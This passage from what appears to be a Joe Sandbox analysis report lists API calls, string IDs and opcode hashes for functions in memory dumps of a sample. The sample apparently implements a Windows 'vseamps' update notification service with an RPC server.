                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                    • Instruction ID: c2791d89649f0358f3f5760d489d7d725788771c1be4c632895068d692f3ddd1
                                                    • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                    • Instruction Fuzzy Hash: 8631C32BB2B6C9D1EE17DF42A8207796294BF4AF60F594634ED1D06792EF3CE4418304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                    • Instruction ID: 595066cfcdd0a141e87c496d776dfaf6f7c4a43708b59e1726635ff1d5180cf1
                                                    • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                    • Instruction Fuzzy Hash: 3F213D6BF0E2CA85F65BEF61557133952626F46FB0F144638E93E06BC7FE2CA4418608
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                    • Instruction ID: e0e1cfd9f61e37e9ad00c875213b98f86e973ac9db4b112506b883751a0c23af
                                                    • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                    • Instruction Fuzzy Hash: 3611A236B19B4582E352CF52A86432972A0BB89FE4F040234ED5E87BA5CF7CD5248748
                                                    APIs
                                                    • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                    • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                      • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                      • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                      • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                      • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                      • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                      • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                      • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                      • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                      • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                      • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                      • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                    • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                    • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                      • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                      • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                      • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                      • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                      • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                      • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                    • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                    • String ID: vseamps
                                                    • API String ID: 3197017603-3944098904
                                                    • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                    • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                    • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                    • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Messagesprintf_s
                                                    • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                    • API String ID: 2642950106-3610746849
                                                    • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                    • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                    • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                    • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                    • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                    • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                    • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                    • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                    • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                    • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                    APIs
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 319667368-0
                                                    • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                    • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                    • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                    • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                    APIs
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                    • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                      • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                    • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                    • String ID:
                                                    • API String ID: 1390108997-0
                                                    • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                    • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                    • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                    • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 3523768491-393685449
                                                    • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                    • Instruction ID: 2f58e4dc9fe4aa42e364bc6341b378f6bf0ef92de018b8b917c81c0699ca258e
                                                    • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                    • Instruction Fuzzy Hash: F7E1BE37A097CACAEB22EF64D4A03AD77A0EB56B48F150135DA8C47756DF38E481C705
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D95CB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D9601
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D962E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D963F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D9650
                                                    • SetLastError.KERNEL32(?,?,?,00007FFDA55D8BC9,?,?,?,?,00007FFDA55D8C14), ref: 00007FFDA55D966B
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                    • Instruction ID: 9b67b44bbd2fe2b9364ae90a8078e089ec1c0ce4b2f3e110e9e482db4a0f8290
                                                    • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                    • Instruction Fuzzy Hash: CF113E6BF0E28A85FA5BEF21557133922629F46FB0F444735E83E067C7EE2CA4518708
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                    • String ID:
                                                    • API String ID: 3326452711-0
                                                    • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                    • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                    • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                    • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                    • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                    • API String ID: 2984211723-1229430080
                                                    • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                    • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                    • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                    • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                    • Instruction ID: fe33a975cf860619d53e14553c80f2f3779049f800c9c6428b61fef2139097bc
                                                    • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                    • Instruction Fuzzy Hash: F3F0A46BB1A60AC1EA22CF20E4643396320AF86B61F440235D96E453E9CF2CE056C304
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                    • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                    • ExitProcess.KERNEL32 ref: 0000000140008545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: AddressExitHandleModuleProcProcess
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 75539706-1276376045
                                                    • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                    • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                    • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                    • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                    • Instruction ID: 6d97b1d9f2fa4a5d9a4b5bd54b49e56a691506c75562b9e1337ad1f19546770f
                                                    • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                    • Instruction Fuzzy Hash: DBB18E2BB0B6CAC1EA66DF95946033D6390AF56F84F098435DE4D0778BDEACE4918308
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: FileInfoSleepStartupType
                                                    • String ID:
                                                    • API String ID: 1527402494-0
                                                    • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
